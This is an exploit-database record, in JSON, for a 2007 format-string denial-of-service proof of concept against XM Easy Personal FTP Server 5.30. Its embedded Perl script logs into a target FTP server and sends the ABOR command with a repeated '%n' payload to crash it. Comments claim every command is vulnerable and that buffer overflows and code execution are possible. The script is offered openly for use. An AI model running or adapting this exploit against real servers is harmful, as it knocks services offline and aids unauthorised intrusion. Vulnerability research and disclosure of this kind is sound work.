Exploit for unknown platform in category dos / poc
{"id": "1337DAY-ID-6321", "type": "zdt", "bulletinFamily": "exploit", "title": "XM Easy Personal FTP Server 5.30 (ABOR) Format String DoS Exploit", "description": "Exploit for unknown platform in category dos / poc", "published": "2007-02-28T00:00:00", "modified": "2007-02-28T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/6321", "reporter": "Umesh Wanve", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-11T17:51:04", "viewCount": 7, "enchantments": {"score": {"value": -0.7, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.7}, "sourceHref": "https://0day.today/exploit/6321", "sourceData": "=================================================================\r\nXM Easy Personal FTP Server 5.30 (ABOR) Format String DoS Exploit\r\n=================================================================\r\n\r\n\r\n\r\n\r\n\r\n#!/usr/bin/perl -w\r\n#=========================================================================================================\r\n# XM Easy Personal FTP Server 5.3.0 Multiple vulnerabilities\r\n# By Umesh Wanve \r\n#=========================================================================================================\r\n#\r\n# Vendor: http://www.dxm2008.com/\r\n#\r\n# Date: 28-02-2007\r\n#\r\n#\r\n# 1) Multiple format string attacks. Every command is vulnerable.\r\n# With only single % also the server crashes.\r\n# \r\n# 2) Multiple buffer overflow occurs in commands if we fuzz the server( Better way use ur own fuzzer)\r\n# \r\n# \r\n# Code execution is possbile. \r\n# This is latest version of FTP server. \r\n#\r\n# ###########################################################################################\r\n\r\nuse Net::FTP;\r\n\r\n(($target = $ARGV[0])) || die \"usage:$0 <target> <port>\";\r\n\r\nmy $user = \"test\";\r\nmy $pass = \"test\";\r\n\r\n\r\n$exploit_string = \"%n\" x 10;\r\n\r\n\r\nprint \":: Trying to connect to target system at: $target...\\n\"; \r\n\r\n$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die \"could not connect: $!\";\r\n\r\nprint \"Connected!\\n\";\r\n\r\n$ftp->login($user, $pass) || die \"could not login: $!\"; \r\nprint \"Logged in!\\n\";\r\n\r\n$ftp->command(\"ABOR \",$exploit_string); # Every command is vulnerable. Use it what u like :)\r\nprint \"Done!\\n\";\r\n\r\n$ftp->quit; \r\n\r\n\r\n\n# 0day.today [2018-04-11] #", "_state": {"dependencies": 1647515097, "score": 1659766679}}